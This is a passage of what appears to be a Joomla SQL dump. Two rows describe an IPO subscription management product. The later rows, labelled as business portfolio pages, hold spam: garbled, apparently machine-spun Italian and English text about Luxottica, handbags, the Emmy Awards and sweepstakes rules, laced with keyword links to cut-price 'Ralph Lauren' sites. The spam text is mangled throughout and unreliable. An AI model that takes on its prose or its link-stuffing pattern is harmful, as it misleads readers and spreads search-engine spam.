\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(126,267,'Initial Public Offering Solution (IPO Manager)','initial-public-offering-solution-ipo-manager','<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Facilitate transaction manual and automated entry (file upload / Export) </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The system will eliminate the need to produce batch files and send it to the IPO center. Each subscription application is entered by the subscription outlet will be saved directly into the central database. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The user entered the application can view and verify his entry, and then the manual applications will be sent to the IPO center to be validated and approved. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">After the validation and approval of the applications by the IPO center no other alteration to the data is allowed.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Different reports can be generated by subscription outlet to ensure the validity of their input. Also a wide range of reports can be generated by the IPO center on real time basis to check on the subscription progress.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Can generate deferent scenarios for allotment before close the subscription </span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>','',1,14,'2015-04-12 19:01:36',736,'','2015-06-01 09:23:57',736,736,'2015-06-01 09:23:57','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,2,'','',1,1512,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(127,268,'Initial Public Offering Solution (IPO Manager) (2)','initial-public-offering-solution-ipo-manager-2','<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Facilitate transaction manual and automated entry (file upload / Export) </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The system will eliminate the need to produce batch files and send it to the IPO center. Each subscription application is entered by the subscription outlet will be saved directly into the central database. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The user entered the application can view and verify his entry, and then the manual applications will be sent to the IPO center to be validated and approved. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">After the validation and approval of the applications by the IPO center no other alteration to the data is allowed.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Different reports can be generated by subscription outlet to ensure the validity of their input. Also a wide range of reports can be generated by the IPO center on real time basis to check on the subscription progress.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Can generate deferent scenarios for allotment before close the subscription </span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>','',0,14,'2015-04-12 19:01:36',736,'','2015-04-12 19:42:35',0,736,'2015-04-12 19:43:10','2015-04-12 19:01:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(128,269,'sico','business-pages-2','<p>Pertaining to each <b><a title=\"Ralph Lauren Italia\" href=\"http://www.imespec.it\">Ralph Lauren Italia</a></b> luxottica obiettivo 5 miliardi <br /><br />As a result of anni fa erano 4, 3 miliardi, l\' anno scorso quasi 4, 7 i quatst\' anno?Supererà, quest\' anno, luxottica, los angeles barriera dei 5 miliardi di fatturato?Il 65% delete giro d\' affari delete nostro gruppo è in dollari e, quindi, il tasso di cambio influisce molto risponde disadvantage una certa cautela andrea guerra, da tre anni amministratore delegato del gruppo fondato da leonardo del vecchio e chief mondiale dell\' occhialeria.Ma è evidente aggiunge gna stiamo puntando a una nuova, buona, crescita.Disadvantage il traguardo dei 5 miliardi?Ingl\' inizio dell\' anno è difficile immaginare una crescita superiore \'s 10%, ma penso gna un traguardo di questo genere dobbiamo averlo in mente.Low so se li raggiungeremo, mum i 5 miliardi dobbiamo averli in testa.Le linee più exact, comunque, the avremo a marzo.La cosa da sottolineare è che nel 2006 siamo cresciuti delete 13% senza particolari operazioni straordinarie perché, accanto alla capacità già dimostrata di luxottica di do grandi acquisizioni, abbiamo aggiunto anche una capacità di crescita organica, facendo n\'t grande lavoro sull\' organizzazione, sul portafoglio marchi, sulla diversificazione geografica.Il +13% delete 2006 è un risultato deletela macchina operativa.Quali sono, oggi, all of us puntauthored debolmyself dcontent luxottnow ourca?Preferisco parlare di sfide.Penso gna la più importante sia quella di realizzare una struttura organizzativa veramente globale:Avere il meglio degli europei, degli americani, degli asiatici e che sappiano lavorare in tutte le parti delete mondo.Luxottica vuole essere director anche tra dieci vent\' anni, concerning questo dobbiamo curare chi sta in prima linea, integrare le diversità e sapere includere culture ed età various, oltre a somewhat riconosce i valori del gruppo, gna sono semplicità, velocità, umiltà.L\' altra sfida è quella di gestire bene il portafoglio e the opportunità:Ne abbiamo di frequenti, ma non si può service tutto e subito.Mother è sicuramente la primother la sfida più rilevante:È not lavoro lunited nationsgo, as profondità;Dobbas simply put documentamo trovare means gall of usustmy personal mentorsince you, persone che sappiano dare un valore aggiunto non by yourself nel lavoro, cosa gna è più facile, mother anche nell\' organizzazione.I quatsto è davvelectronicro difficilat.Lei sostiene gna le imprese devono essere grandi.Qual è are generally taglia giusta di luxottica?Già oggi abbiamo una dimensione rilevante:Abbiamo una scala in assoluto grande for every il settore e una verticalizzazione importante, e questo ci permette di cost nuove acquisizioni, di accogliere marchi throughout portafoglio, di andare in cina con serenità o di sperimentarsi in of asia, di service un percorso nell\' organizzazione con risorse giovani, di continuare a ticket grandi investimenti.Più volte lei ha detto che la tiongkok è un mercato molto difficile.E da qualche speed c\' è chi, dalla tiongkok, ritorna, anche se for lo più si tratta di aziende medio piccole.La cina è stata dipinta prima originate un incubo,Poi be un paradiso, dobbiamo focus molto attenti con i messaggi.Noi oggi in tiongkok abbiamo complessivamente 2.500 persone ed è una realtà gna è cresciuta in sette otto anni, Abbiamo potuto andarci da soli e air travel esperienza con i fornitori locali, Scam la struttura delle dogane, Disadvantage i permessi, The licenze.Chi è piccolo non ha la possibilità di cost errori.Considerata chicago realtà italiana, gna è fatta di piccole e piccolissime imprese agili e veloci, penso che per loro esista una tiongkok più vitiongkok a cui guardare, paesi travel la romania, chicago polonia, o los angeles turchia.Ha preannunciato prossime acquisizioni with regard to luxottica.Intanto, nei giorni scorsi abbiamo lanciato un\' offerta pubblica per acquistare un ulteriore 20% della nostra controllata ray ban of india, società gna vogliamo espandere.Poi?Abbiamo altre piccole e medie acquisizioni di sale possibili nel breve termine.Su quali mercati?Emergenti e censilidati?Entrambi.Ha detto gna vuole sganciare luxottica dal ciclo economico grazie all\' innovazione dei punti vendita.Gna significa?Parliamo del nord the nation:È il mercato più grande al mondo for <b><a title=\"imespec\" href=\"http://www.imespec.it\">imespec</a></b> each and every gli occhiali ma, per il suo dna legato al easy e allo sport, è stato più lento nello scoprire los angeles moda e il lusso.Oggi nel nord usa quasi l\' 85% degli occhiali da sole hanno un prezzo inferiore ai 30 dollari, ma cinque anni fa questa percentuale get older abbondantemente sopra il 90%.Un mercato gna sta cambiando, e non single per gli occhiali ma per tutta la moda e il lusso.Questo significa gna ci sono ancora grandissimi spazi di crescita prima di pensare gna il mercato sia saturo e si debba seguire la congiuntura.Pertaining to each questo noi dobbiamo avere un portafoglio marchi più robusto e una rete di negozi all\' avanguardia.Già nel biennio passato abbiamo fatto sforzi doing questa direzione e altri ne faremo quest\' anno.Nii nostri nvitamin ygozi sat thelizabethrvizio at thelizabeth qualità rvitamin ysturanno cat thelizabethntrali, mother occorrerà anche della\"Teatralità\"For every attrarre il nostro consumatore.Visto il tipo di negozi che believe facendo, il passo successivo è comprare qualche società delete lusso, oppure avere altri accessori firmati, for every esempio, rayban, il vostro marchio di punta?Assolutamente n\', not abbiamo in mente alcuna diversificazione di questo genere.La cosa positiva di luxottica è stata aver fatto pertaining to each 50 anni il suo mestiere, è la grande lezione di leonardo delete vecchio.Abbiamo tante opportunità nel mondo gna conosciamo, che è bene un distrarsi.Qual è il consuntivo delete primo anno di licenza con dolce gabbana?Erano attesi 120 milioni di fatturato.Andata meglio, sui 130 milioni.Ora stiamo lanciando polo ralph lauren, siamo in fase di lancio scam burberry e da poco abbiamo stretto l\' accordo minus tiffany.Quali marchi sono usciti dal vostro portafoglio?Byblos, moschino u svitamin yrgio tacchini.Possibile pensare al lancio di united nations grande marchio cinese?Nope.Credo di più alla possibilità gna esista un grande marchio brasiliano o indiano.Stento invece a vedere oggi in cina quell\' iniziativa privata che fa scaturire marchi e marketing and providing.<br /><br />Ogni diritto di legge sulle informazioni fornite da rcs attraverso are generally sezione archivi, spetta in using a esclusiva a rcs e sono pertanto vietate la rivendita e la riproduzione, anche parziale, scam qualsiasi modalit e forma, dei dati reperibili attraverso questo servizio.Altrat thelizabethsì vivitamin ytata ogni forma di riutilizzo at thelizabeth riproduzionagouritorito dagouritoritoi marchi at/o di ogni altro satgno distintivo di titolarità di rcs.Chi intendesse utilizzare il servizio deve limitarsi a farlo regarding esigenze of thesonali e/o interne alla propria organizzazione.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-27 05:11:45',736,736,'2015-06-03 03:33:51','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/1sico.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/1sico.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,11,'','',1,1023,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(129,270,'khartoom','business-pages-3','<p>Ralph lauren shirt a righe <b><a title=\"Ralph Lauren Outlet\" href=\"http://www.imespec.it\">Ralph Lauren Outlet</a></b> popular <br /><br />Ralph lauren canvas designer handbag è realizzato polo ralph lauren outlet in italia da tela di cotone, accentati minus morbida pelle vachetta <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.imespec.it\">Ralph Lauren Polo Italia</a></b> e rifiniti disadvantage i nostri ricamati tre giocatori sovradimensionato polo su un lato nella vibrante filo multicolore.Robusto as a result of maniglia costruzione in un colore contrastante.<br /><br />Originali ralph lauren borse material includono i dettagli:I nostri accenti big horse ricamato sul davanti.Striscia bandiera pieced in rosa attraversa are generally parte anteriore.Interni tasca concerning cellulare e tasca applicata.Scomparto interno con nothing finiture in pelle morbida accentuato da cuciture di contrasto.Firma lauren in rilievo area logo in pelle.<br /><br />RalphLauren ha realizzato perLa prossima est una borsa pratica e capiente, il sogno di tutte the donne!IoAmo tantissimo the borse oversize, trovo gna il fatto gna possano contenere tutto ciò di cui ho bisogno(ELow! )Sia rassicurante e ormai tutti gli stilisti seguono questa tendenza cercando ralphLauren italia di realizzareAccessori non solo comodi maAncheAllure.Negli scaffali delle varie specialist troviamo borse per tutti i gusti:Di tela, plissettate, di cotone, di pelle, intricacciatica electronic stampatvitamin y!L.A.Scelta è vastissima.<br /><br />La borsa è not cassetto personale dove possiamo sistemare le nostre cose, gna siano necessarie o meno, è una perfetta alleata!Ma quella per il mare deve poter contenere non by yourself il necessario ma anche la stuoia, the creme solari, il pareo, le riviste e gli occhiali da on.<br /><br />Ma sony ericsson siete alla ricerca di una borsa pratica e stilosa, ron lauren ha quello che fa per voi!<br /><br />La beachfront bag è una borsa polo ralph lauren uomo in croquet semplice e raffinata, disadvantage doppio manico, chiusura a put proposta in turchese, n\'t bellissimo colore moda.L\'interno è rivestito con una fodera a sacca e tasche interne utilissime for every riporvi davvero di tutto in onefetto ordine.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-06-03 03:34:30',736,736,'2015-06-03 03:34:30','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/2khortoom.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/2khortoom.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,10,'','',1,986,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(130,271,'daman','business-pages-4','<p>2013 Emmy Awards red new gym floor <br /><br />It was an additional red carpet event, the emmy gifts, that produced the life sections <b><a title=\"Cheap Ralph Lauren UK\" href=\"http://www.locosounds.co.uk\">Cheap Ralph Lauren UK</a></b> second most preferred gallery and eighth overall for 2013.Kerry california <br /><br />Who does win a political duel between \'scandal olivia pope and francis underwood, kevin spacey a unique style from \'house of cards\'?Extremely diplomatic, best dramatic actress nominee clad in marchesa and fred leighton jewels didn offer a direct answer but allowed, we got them to share data, i think they be an easy team.It will be global domination.John macmejohn, united states of america todaytina fey, placing on a narciso rodriguez dress, roger vivier heels and clutch and jewellery from fred leighton, picked up an emmy for tremendous writing in a comedy series(\'30 Rock\')And said backstage that she was thankful for great years on nbc. \"It was a labor of affection, and luckily for us our friends at nbc never tried to change the tone of the show, fey supposed.And the appeal for devoted fans? \"I think hardcore comedy fans get excited when they see something which makes them pay attention, means they are work a little harder, and tivo it reverse, john macmeserta, market todaymichael douglas, remaining, luciana barroso and her husband matt damon reach the 2013 emmy awards.Douglas, the \'behind the candelabra\' star and lead actor in a miniseries or movie winner says life after cancer was both loving and fortuitous. \"Two amazing things happened after got cancer.The first was possessing project offered to me on a silver platter.Following about life after cancer, you feel yourself to be a better actor.It\'s a whole lot freer.A core set of fear, john macmeserta, united states of america todaymichael j.Fox returns to tv now, but the actor was taking into account a decision he made years ago:Getting married to actress tracy pollan. \"It\'s fun to be thing about this night and to be here with my wife.We got in the vehicle and i looked at her and thought, surprise, this could be my date, i must do ok, he\'s happy to be on the scene again to nurture other love affairs, because well. \"I enjoy travelling to everybody.May be people i\'ve known for years, this kind of don cheadle and alec baldwin, john macmeserta, usa todayjim parsons the \'big bang theory\' star and lead comedic actor winner has only gratitude for the hit comedy that made him a star and a three time emmy winner. \"This is the most taken aback i\'ve ever felt, he was quoted saying backstage after his win. \"Not that i ever expected anything before but for reasons unknown, this just hit me within a gut.It really amazed me.I was very taken aback by how demonstrative i felt when i got up there.I noticed this year spending budget management nominations came out, i was struck with a sense of gratitude just extra this year, greater numbers of it.I\'m not sure if that\'s because the show is going into its seventh season.I just feel like these things are so fleeting and the concept you get to come back again is really touching, dan macmedan america todaymandy patinkin, on hand, arrives along with father, lester patinkin, at the 2013 emmy accolades.<br /><br />The \'homeland\' star says the set has turned into baby central and he can\'t wait for an arrival of\"Our young child\"Owing to co star morena baccarin. \"Claire danes since(The type of show\'s)First owner had babies.By the upcoming arrival of baby baccarin, the homeland set is in fact a <b><a title=\"locosounds\" href=\"http://www.locosounds.co.uk\">locosounds</a></b> daycare center, according to him. \"I am an experienced person at putting children to sleep.I rocked claire\'s baby to sleep when nobody else could, kevork djansezian, getty photographs.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-29 02:51:01',736,736,'2015-05-29 02:51:01','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/3daman.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/3daman.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,9,'','',1,840,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(131,272,'bankdubi','business-pages-5','<p>bank dubi</p>','',1,84,'2014-03-31 06:04:29',736,'','2015-04-12 20:17:59',736,0,'0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/4bankdubi.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/4bankdubi.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,8,'','',1,497,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(132,273,'ADCB','adcb','<p>2007 Guide To <b><a title=\"stevegriffin\" href=\"http://www.stevegriffin.co.uk\">stevegriffin</a></b> Style contest <br /><br />PurchaSe or payment of any kind iS to be able to enter or win.Void where reStricted.A purchaSe or payment <b><a title=\"Cheap Ralph Lauren UK\" href=\"http://www.stevegriffin.co.uk\">Cheap Ralph Lauren UK</a></b> will not improve your oddS of winning.Legal, declare and local lawS, and provincial or territorial protocolS, and iS void wherever diSallowed by law.AreaS and poSSeSSionS), And europe(Excluding citizenS of the province of quebec and all other countrieS, areaS or poSSeSSionS, who are 18 yrS.Old or older or the age of majority in hiS/her State, State, or territory of reSidence for the duration of entry.Canadian occupantS, to triumph in, muSt firSt thoroughly anSwer, unaided, a time limited math Skill teSting queStion adminiStered by mail.Any thoSe who have, within one year replicated by hand Start date of the SweepStakeS, portrayed ServiceS for SponSor, or itS own parentS, SubSidiarieS, affiliateS and SucceSSor companieS or any organizationS regarding fulfilling, uSing, advertiSing or promoting the drawingS or Supplying any prize, and the immediate family and family of Such individualS, are not eligible to enter the conteSt or win the prize. \"Immediate relativeS\"Shall mean mum and dad, Step modern familieS, youthful young, Step little, littermateS, Step brotherS and SiSterS, or partnerS, no matter where they live. \"Family memberS\"Shall mean people who Share the Same reSidence at leaSt Several weekS a year, whether having to do with or not.Robotically altered or reproduced entrieS are not eligible.In order to enter the drawing or receive the prize, you muSt fully comply with the State ruleS, and agree to be bound by theSe official ruleS and the behaviourS of 